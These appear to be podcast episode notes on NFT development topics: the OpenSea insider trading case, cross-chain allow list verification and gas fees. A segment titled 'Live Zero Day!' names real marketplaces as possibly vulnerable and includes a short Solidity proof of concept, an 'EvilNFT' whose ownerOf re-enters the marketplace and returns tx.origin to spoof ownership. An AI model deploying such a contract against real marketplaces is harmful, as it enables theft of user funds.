Evil ownerOf

27 / We talk about OpenSea insider trading charge, facts, legal analysis, allow list to your (testnet) beta testers, beer of the day, make your own bridge (simple, insecure), drops with random timing, cross chain minting by centralizing, and Evil ownerOf.

Timeline

01:07 OpenSea insider trading charge, facts

02:21 Legal analysis

06:42 Give allow list to your (testnet) beta testers

09:03 Beer of the day

09:12 Make your own bridge (simple, insecure)

11:51 Drops with random timing!

13:06 Cross chain minting by centralizing

15:05 Evil ownerOf

Participants

Episode notes

Edit these notes…

OpenSea insider trading
- https://www.justice.gov/usao-sdny/pr/former-employee-nft-marketplace-charged-first-ever-digital-asset-insider-trading-scheme
- https://www.bloomberg.com/opinion/articles/2022-06-02/don-t-insider-trade-nfts#xj4y7vzkg
@037 If you wanted to do an airdrop of coins to only a set of wallets that participated on another contract in a dev chain (example: Rinkeby), is there a way to do cross-chain verification using an arbitrary block height? (example: give 10 coins from Contact “A” in Mainnet if Wallet “A” interacted with Contract “B” on Rinkeby before block height “X”). This is to promote mass beta testing to hopefully catch bugs before live deploy.…
- Option A – Bridge
  - Use Rinkeby to make a separate contract and use a bridge to send those tokens to the other chain.
- Option B – “get hands dirty”
  - Rinkeby allowlist contract
    - Function isAllowlisted emits logs, not a view function, in other words ONE transaction results in MULTIPLE allow list validations
  - On Mainnet validate these logs
    - Validate multiple consecutive blocks, with difficulty, using parent block and difficulty, this only works with proof of work
    - Validate specific transaction using inclusion Merkle proof
    - Validate and the transaction receipt (see Yellow Paper BERLIN, page 6, transaction receipt data structure) to confirm the logs were emitted
    - Optional: add a time limit to this redeemability (using block.timestamp)
- Option C – Centralize
  - Time public time limits / redeem periods / for accountability
  - After that happens, everybody can see it and run the tool, copy this: https://github.com/su-squares/update-script and https://github.com/miguelmota/merkletreejs-nft-whitelist
Addressing gas fees
- Bonding curves
- Dutch auctions
Live Zero Day!
- Affected marketplaces are potentially 2018 smart contracts that allow selling any NFT, and have a balance of value (not just allowlisted ones)
  - OpenSea
  - Rarebits
  - Superrare
  - Niftygateway

// SPDX-License-Identifier: UNLICENED
pragma solidity 0.5.0;

interface NFT {
  function ownerOf(uint256) external view returns (address);
}

contract EvilNFT {
  Marketplace public marketplace;

  function setMarketplace(Marketplace marketplace_) external {
    marketplace = marketplace_;
  }

  function ownerOf(uint256) external returns (address) {
    marketplace.reprice();
    return address(tx.origin);
  }
}

contract Marketplace {
  uint256 public price = 0;

  function reprice() external {
    price++;
  }

  function doSomething(NFT nft, uint256 tokenID) external {
    // collect money from msg.sender
    require(nft.ownerOf(tokenID) == msg.sender);
    // check price
    // send money to DAO
  }
}

Bankless got blocked on YouTube
- CEO tweeted sorry!